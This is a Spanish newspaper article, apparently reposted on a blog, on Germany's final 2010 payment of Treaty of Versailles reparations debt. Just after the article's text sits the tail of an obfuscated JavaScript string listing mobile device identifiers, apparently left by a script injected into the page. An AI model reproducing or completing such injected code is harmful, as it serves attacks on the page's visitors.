• Noticias maquetadas 30.09.2010

    ROSALÍA SÁNCHEZ / Berlín

    La Primera Guerra Mundial termina

    este domingo

    Alemania acaba de pagar la deuda del Tratado de Versalles
    Especial para EL MUNDO

    Alemania abona esta semana los últimos pagos de la deuda por las reparaciones de guerra establecidas en el Tratado de Versalles de 1919. Así termina, definitivamente y 92 años después, la Primera Guerra Mundial. Los alemanes se desprenden de esta forma de lo que siempre percibieron como un ignominioso lastre de la historia. El último pago asciende a la cantidad de 69,9 millones de euros, incluidos en los Presupuestos de 2010, y corresponde a los bonos emitidos en cumplimiento del artículo 231, que identificaba a Alemania como única culpable de la guerra y la hacía responsable de las pérdidas y daños causados.

    El 90% de los bonos de deuda emitidos para pagar las reparaciones han sido abonados. El 10% restante se perdió en los torbellinos del siglo XX y el Bundesbank había dado de plazo, para presentarlos, hasta el 3 de octubre de 2010, fecha en que se cumplen 20 años de la reunificación y en la que Alemania da por saldada su deuda. La historia de esta deuda está salpicada de afrentas y actos de patriotismo.

    Ya antes de que una comisión en Versalles estimase las cantidades a pagar, Alemania fue obligada a entregar a los Aliados, como anticipo, su flota mercante y de guerra, pero la Marina hundió esta última antes de que pudiese efectuarse el traspaso. Finalmente, los vencedores exigieron el pago de 20.000 millones de marcos de oro hasta abril de 1921, como primer paquete de reparaciones, cifra que aumentó a 296.000 millones de marcos de oro a pagar en 42 años tras la Conferencia de Boulogne de 1920. Cuando el mariscal de campo francés, Ferdinand Foch, conoció los primeros datos, pronunció lo que acabaría siendo una profecía: «Esto no es una paz; es un armisticio de 20 años».

    Los firmantes del Tratado, el primer ministro británico Lloyd George, el ministro italiano Giorgio Sonnino, el jefe del Gobierno francés Georges Clemenceau y el presidente de EEUU Woodrow Wilson castigaron duramente a Alemania en términos territoriales, privaron al país de su Ejército y amputaron sus fuentes de ingresos en forma de exportaciones.

    Si Churchill comienza sus memorias recordando que, en 1914, la frase «la guerra que ha de acabar con todas las guerras» estaba en boca de todos, hoy son muchos los historiadores que señalan la dureza del Tratado de Versalles como el factor desencadenante de la Segunda Guerra Mundial.

    Después de 1945, la República Federal de Alemania asumió la deuda acumulada y consiguió terminar de pagarla en 1983. Quedaban pendientes, sin embargo, los intereses. Los pagos fueron reanudados en 1996 y terminan el domingo. Tras pagar una deuda de proporciones bíblicas y pedir perdón por los crímenes del nazismo, Alemania emprende una nueva etapa con la frente en alto.

    z|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

  • Comments are closed.

Calendario de artículos

septiembre 2010
L M X J V S D
 12345
6789101112
13141516171819
20212223242526
27282930  

Artículos anteriores